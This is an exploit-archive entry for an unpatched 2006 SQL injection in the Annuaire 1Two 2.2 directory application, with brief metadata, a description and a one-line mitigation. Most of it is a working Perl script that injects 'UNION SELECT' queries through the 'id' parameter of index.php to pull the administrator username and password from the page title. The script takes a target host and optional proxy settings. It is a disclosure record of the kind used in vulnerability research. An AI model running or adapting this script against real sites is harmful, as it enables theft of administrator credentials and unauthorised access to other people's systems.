Annuaire 1Two 2.2 Remote SQL Injection Exploit

vendor:

Annuaire 1Two 2.2

by:

DarkFig

6,5

CVSS

MEDIUM

SQL Injection (without quote)

CWE

Product Name: Annuaire 1Two 2.2

Affected Version From: Annuaire 1Two 2.2

Affected Version To: Annuaire 1Two 2.2

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

Annuaire 1Two 2.2 Remote SQL Injection Exploit

This exploit allows an attacker to gain access to the username and password of the Annuaire 1Two 2.2 application. The exploit is done by sending a malicious HTTP request to the application with the 'id' parameter set to a value of '-1 UNION SELECT username FROM 1two_annuaire_admin' and '-1 UNION SELECT password FROM 1two_annuaire_admin'. The application then returns the username and password in the response.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

#!/usr/bin/perl
#
# Affected.scr..: Annuaire 1Two 2.2
# Poc.ID........: 09060902.txt
# Type..........: SQL Injection (without quote)
# Risk.level....: Medium
# Vendor.Status.: Unpatched
# Src.download..: http://www.1two.org/
# Poc.link......: acid-root.new.fr/poc/09060902.txt
# Credits.......: DarkFig
#
#
use LWP::UserAgent;
use HTTP::Request;
use Getopt::Long;
use strict;


print STDOUT "\n+", '-' x 53, "+\n";
print STDOUT "|    Annuaire 1Two 2.2 Remote SQL Injection Exploit   |\n";
print STDOUT '+', '-' x 53, "+\n";

my($host,$path,$proxh,$proxu,$proxp,);
my $opt = GetOptions(
   'host=s'   =>  \$host,
   'path=s'   =>  \$path,
   'proxh=s'  =>  \$proxh,
   'proxu=s'  =>  \$proxu,
   'proxp=s'  =>  \$proxp);
   
if(!$host) {
    print STDOUT "| Usage: ./xx.pl --host=[www] --path=[/] [Options]    |\n";
    print STDOUT "| [Options] --proxh=[ip] --proxu=[user] --proxp=[pwd] |\n";
    print STDOUT '+', '-' x 53, "+\n";
    exit(0);
}

if(!$path) {$path  = '/';}
if($host  !~ /http/) {$host  = 'http://'.$host;}
if($proxh !~ /http/ && $proxh != '') {$proxh = 'http://'.$proxh.'/';}

my @fi = ('username', 'password');
my $ur = $host.$path.'index.php?id=';
my $ua = LWP::UserAgent->new();
   $ua->agent('Mozilla XD');
   $ua->timeout(30);
   $ua->proxy(['http'] => $proxh) if $proxh;

foreach(@fi) {
my $xx = $_;
my $re = HTTP::Request->new(GET =>  $ur."-1 UNION SELECT $xx FROM 1two_annuaire_admin");
   $re->proxy_authorization_basic($proxu, $proxp) if $proxp;
my $xd = $ua->request($re);
my $da = $xd->content;

if($da =~ /- (.*?)<\/title>/) {
      if($xx eq 'username') {
            print STDOUT " [+]User:";}
      if($xx eq 'password') {
            print STDOUT " [+]Passwd:";}
      print STDOUT " $1\n";
} else {
  print STDOUT "[!]Exploit failed\n";
}}
print STDOUT "+", '-' x 53, "+\n";
exit(0);

# milw0rm.com [2006-09-02]